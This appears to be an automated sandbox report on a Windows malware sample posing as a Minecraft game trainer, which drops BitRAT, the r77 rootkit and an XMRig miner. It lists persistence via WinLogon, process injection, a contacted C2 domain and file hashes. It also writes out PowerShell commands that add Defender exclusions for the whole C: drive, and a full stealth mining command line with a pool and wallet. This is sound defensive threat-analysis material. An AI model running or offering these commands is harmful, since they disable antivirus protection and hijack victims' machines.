Analysis Overview
SHA256
62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128
Threat Level: Known bad
The file 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128 was found to be: Known bad.
Malicious Activity Summary
xmrig
Modifies WinLogon for persistence
r77 rootkit payload
BitRAT
r77
XMRig Miner Payload
Executes dropped EXE
Checks computer location settings
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-10 13:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-10 13:31
Reported
2022-03-10 13:34
Platform
win7-20220223-en
Max time kernel
4294178s
Max time network
121s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
Network
Files
memory/1720-54-0x0000000000170000-0x0000000000692000-memory.dmp
memory/1720-55-0x0000000074580000-0x0000000074C6E000-memory.dmp
memory/1720-56-0x0000000004E00000-0x0000000004E01000-memory.dmp
memory/1720-57-0x0000000006250000-0x0000000006758000-memory.dmp
memory/1720-58-0x0000000000810000-0x000000000082C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-10 13:31
Reported
2022-03-10 13:35
Platform
win10v2004-en-20220112
Max time kernel
162s
Max time network
165s
Command Line
Signatures
BitRAT
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\WindowUpdate.exe\"," | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
r77
r77 rootkit payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3768 set thread context of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe |
| PID 2180 set thread context of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe |
| PID 3632 set thread context of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe |
| PID 3032 set thread context of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\explorer.exe |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\explorer.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
"C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
"C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe"
C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
"C:\Users\Admin\AppData\Roaming\WindowUpdate.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rtizxvdftafqcz.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\WindowUpdate.exe" -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe" -Force
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowUpdate.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MicrosoftSecurity\MicrosoftSecurity.exe'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=484hzHaCUfmXhMq4nCE1wcFuQ1TVa8BPjdq5oYseNQHoDWQXS8of2U9VLnQ1cL7TVzbRVyY1Su76CAdcDdHxjXrbRbec8LG.rig1/pandalord143 --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 356 -p 3368 -ip 3368
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3368 -s 292
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 3368 -ip 3368
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3368 -s 296
Network
| Country | Destination | Domain | Proto |
| US | 8.238.111.254:80 | tcp | |
| NL | 8.248.7.254:80 | tcp | |
| NL | 8.248.7.254:80 | tcp | |
| US | 8.8.8.8:53 | geo.prod.do.dsp.mp.microsoft.com | udp |
| IE | 51.104.164.114:443 | geo.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | kv801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | kv801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | cp801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | cp801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | gumerez.xyz | udp |
| NL | 37.0.11.77:1991 | gumerez.xyz | tcp |
| NL | 37.0.11.77:1991 | gumerez.xyz | tcp |
Files
memory/3768-130-0x0000000074580000-0x0000000074D30000-memory.dmp
memory/3768-131-0x0000000000D30000-0x0000000001252000-memory.dmp
memory/3768-132-0x0000000005CF0000-0x0000000005CF1000-memory.dmp
memory/3768-133-0x0000000007B80000-0x0000000008124000-memory.dmp
memory/3768-134-0x00000000076C0000-0x0000000007752000-memory.dmp
memory/428-135-0x0000000000400000-0x00000000009D6000-memory.dmp
memory/428-136-0x0000000074580000-0x0000000074D30000-memory.dmp
C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
| MD5 | 2ad4097e232d4002a5e90fa049607869 |
| SHA1 | 9a860a3781854339d3482dd57e75a363c1bde12e |
| SHA256 | b4ad220b7ddd80ec7127f18b9b88e96fcb6a5d4de5c0789f845ad4b8e17acd66 |
| SHA512 | 5911396c485fd00a69a931333e684ee868d3dff22eec59182dc1def719a2ebb943d916b7a8929cac8d3f6ad4b948a5787040110da0cd3d234b48e73df857c277 |
C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
| MD5 | 2ad4097e232d4002a5e90fa049607869 |
| SHA1 | 9a860a3781854339d3482dd57e75a363c1bde12e |
| SHA256 | b4ad220b7ddd80ec7127f18b9b88e96fcb6a5d4de5c0789f845ad4b8e17acd66 |
| SHA512 | 5911396c485fd00a69a931333e684ee868d3dff22eec59182dc1def719a2ebb943d916b7a8929cac8d3f6ad4b948a5787040110da0cd3d234b48e73df857c277 |
C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
| MD5 | 2daa88a0e9da6be6cf972bdb6ebd1ed7 |
| SHA1 | c92d498fe840c676b941494fd30624ee4b91bf19 |
| SHA256 | dfefe990b42699d23b3ada5b3e1c808cc27d48d69cffd6da82bbea92b12fd11c |
| SHA512 | 0dd30b775168b1c8b8f3fb7c2ee6074c0b617c344849b29d16600282c5bbe3db7a39bcd8f7e28d201b3c5ccc138cef3af3bfca527c925d83e28ddc77e154981c |
C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
| MD5 | 2daa88a0e9da6be6cf972bdb6ebd1ed7 |
| SHA1 | c92d498fe840c676b941494fd30624ee4b91bf19 |
| SHA256 | dfefe990b42699d23b3ada5b3e1c808cc27d48d69cffd6da82bbea92b12fd11c |
| SHA512 | 0dd30b775168b1c8b8f3fb7c2ee6074c0b617c344849b29d16600282c5bbe3db7a39bcd8f7e28d201b3c5ccc138cef3af3bfca527c925d83e28ddc77e154981c |
memory/2180-141-0x0000000000010000-0x000000000020E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe.log
| MD5 | 89367199dcebc9edec7c34f3eaf57f5f |
| SHA1 | e344c634845a8d8fc908ceb38df15a26c3f10337 |
| SHA256 | 1ddb35177c237e096d50a243a9ff8bfd8ed98921dc0ecfd1f2e941d463293f72 |
| SHA512 | 6ee8b58a1d432f9ffeea9a8d9d9ad75b66f2e609402c4596fff8debc1f746f5ce695e66c1feae01d87b1803e4ccc55aa3c894f6cf5046634e12a5f7292e18131 |
C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
| MD5 | 50d63ac6d3d7534ab90cdebb34dd3913 |
| SHA1 | 61b04d2c8caa511db49ac8305e85466cb2d3c147 |
| SHA256 | ae8480f3ff00fbfe5b111e7af0ee897c3e237a53b22545f89758f86f03f1dcff |
| SHA512 | 6ba857367b150fbc38e959aea2f33a76d259dafd0d82973f13816482fa0bacde534fc6af07bbd3acef9041cf9989d0f8c7d9ae4b9e5a021c9a82a8841aadaaab |
C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
| MD5 | 50d63ac6d3d7534ab90cdebb34dd3913 |
| SHA1 | 61b04d2c8caa511db49ac8305e85466cb2d3c147 |
| SHA256 | ae8480f3ff00fbfe5b111e7af0ee897c3e237a53b22545f89758f86f03f1dcff |
| SHA512 | 6ba857367b150fbc38e959aea2f33a76d259dafd0d82973f13816482fa0bacde534fc6af07bbd3acef9041cf9989d0f8c7d9ae4b9e5a021c9a82a8841aadaaab |
memory/2180-145-0x0000000074580000-0x0000000074D30000-memory.dmp
memory/3632-146-0x0000000000D70000-0x0000000000FCA000-memory.dmp
memory/1984-147-0x00007FF807820000-0x00007FF8082E1000-memory.dmp
memory/1984-149-0x00000155D44B6000-0x00000155D44B7000-memory.dmp
memory/1984-148-0x00000155D44B3000-0x00000155D44B5000-memory.dmp
memory/1984-150-0x00000155D44B0000-0x00000155D44B2000-memory.dmp
memory/3632-151-0x00007FF807820000-0x00007FF8082E1000-memory.dmp
memory/2180-152-0x0000000004B60000-0x0000000004B61000-memory.dmp
memory/3632-153-0x00000000018F0000-0x00000000018F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs
| MD5 | 41ba08c2482349cca240dab7a700c99b |
| SHA1 | 7092954d24879f12a4af640b5e4751a61b85875d |
| SHA256 | a3d7b48a1ce8ce3d2a205c5f1a25a84e07d114a747e181e33c17ab3e28cd690b |
| SHA512 | d3dc824461f5927ca33487ad6341fb70899c3335ae0a7de098b346d65ec0fc9873f1853e1fe99e4a499e5904f50ba9ab91186fbf59f9c9433f36affee0aef6b7 |
memory/1624-159-0x0000025604B10000-0x0000025604B32000-memory.dmp
memory/1624-162-0x00007FF807820000-0x00007FF8082E1000-memory.dmp
memory/1624-163-0x00000256030A0000-0x00000256030A2000-memory.dmp
memory/1624-164-0x00000256030A3000-0x00000256030A5000-memory.dmp
memory/1624-165-0x00000256030A6000-0x00000256030A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
| MD5 | 5d4073b2eb6d217c19f2b22f21bf8d57 |
| SHA1 | f0209900fbf08d004b886a0b3ba33ea2b0bf9da8 |
| SHA256 | ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3 |
| SHA512 | 9ac94880684933ba3407cdc135abc3047543436567af14cd9269c4adc5a6535db7b867d6de0d6238a21b94e69f9890dbb5739155871a624520623a7e56872159 |
memory/3004-168-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/3004-169-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/3004-166-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/3032-172-0x0000000140000000-0x000000014021E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
| MD5 | 2edd0b288fe2459da84e4274d1942343 |
| SHA1 | c6d88db3c6871b3bb7f9ba9bde893bfcac7c7ee4 |
| SHA256 | 6891da439a64108cc7fd7ca27f14bd726844b20c084506c13681078f5d9a3768 |
| SHA512 | 6c7b06101e33001a5e345246182cc2418bef0c310c382f55ecac9826773b8e37131c1d56a34aaf144f544e3047a55867aa9f22c82c59bbacb262c20dbb5b47f9 |
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
| MD5 | 2edd0b288fe2459da84e4274d1942343 |
| SHA1 | c6d88db3c6871b3bb7f9ba9bde893bfcac7c7ee4 |
| SHA256 | 6891da439a64108cc7fd7ca27f14bd726844b20c084506c13681078f5d9a3768 |
| SHA512 | 6c7b06101e33001a5e345246182cc2418bef0c310c382f55ecac9826773b8e37131c1d56a34aaf144f544e3047a55867aa9f22c82c59bbacb262c20dbb5b47f9 |
memory/768-175-0x0000000004CB0000-0x0000000004CE6000-memory.dmp
memory/768-176-0x0000000074580000-0x0000000074D30000-memory.dmp
memory/768-177-0x0000000004CF2000-0x0000000004CF3000-memory.dmp
memory/768-178-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
memory/3032-179-0x00007FF807820000-0x00007FF8082E1000-memory.dmp
memory/3032-184-0x0000016C9AE80000-0x0000016C9AE82000-memory.dmp
memory/3032-185-0x0000016C9AEB0000-0x0000016C9AEC2000-memory.dmp
memory/3836-187-0x0000024EA2E00000-0x0000024EA2E02000-memory.dmp
memory/3836-186-0x00007FF807820000-0x00007FF8082E1000-memory.dmp
memory/3836-188-0x0000024EA2E03000-0x0000024EA2E05000-memory.dmp
memory/3836-192-0x0000024EA2E06000-0x0000024EA2E08000-memory.dmp
memory/768-193-0x0000000007730000-0x0000000007D58000-memory.dmp
memory/1984-196-0x00000155D44B7000-0x00000155D44B8000-memory.dmp
memory/3052-197-0x0000000074580000-0x0000000074D30000-memory.dmp
memory/3052-198-0x0000000006750000-0x0000000006751000-memory.dmp
memory/3052-199-0x0000000006752000-0x0000000006753000-memory.dmp
memory/1984-200-0x00000155D44B8000-0x00000155D44BA000-memory.dmp
memory/1984-201-0x00000155D44BA000-0x00000155D44BF000-memory.dmp
memory/3836-202-0x0000024EA2E08000-0x0000024EA2E09000-memory.dmp
memory/3052-204-0x0000000006CA0000-0x0000000006CC2000-memory.dmp
memory/3368-203-0x0000000140000000-0x0000000140758000-memory.dmp
memory/3368-205-0x0000000140000000-0x0000000140758000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22fbec4acba323d04079a263526cef3c |
| SHA1 | eb8dd0042c6a3f20087a7d2391eaf48121f98740 |
| SHA256 | 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40 |
| SHA512 | fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e |
memory/3368-206-0x0000000140000000-0x0000000140758000-memory.dmp
memory/768-210-0x0000000007F90000-0x0000000007FF6000-memory.dmp
memory/3052-211-0x00000000075F0000-0x0000000007656000-memory.dmp
memory/768-212-0x0000000008000000-0x0000000008066000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22fbec4acba323d04079a263526cef3c |
| SHA1 | eb8dd0042c6a3f20087a7d2391eaf48121f98740 |
| SHA256 | 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40 |
| SHA512 | fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e |
memory/768-214-0x00000000085C0000-0x00000000085DE000-memory.dmp
memory/768-215-0x0000000004CF5000-0x0000000004CF7000-memory.dmp
memory/3052-216-0x0000000006755000-0x0000000006757000-memory.dmp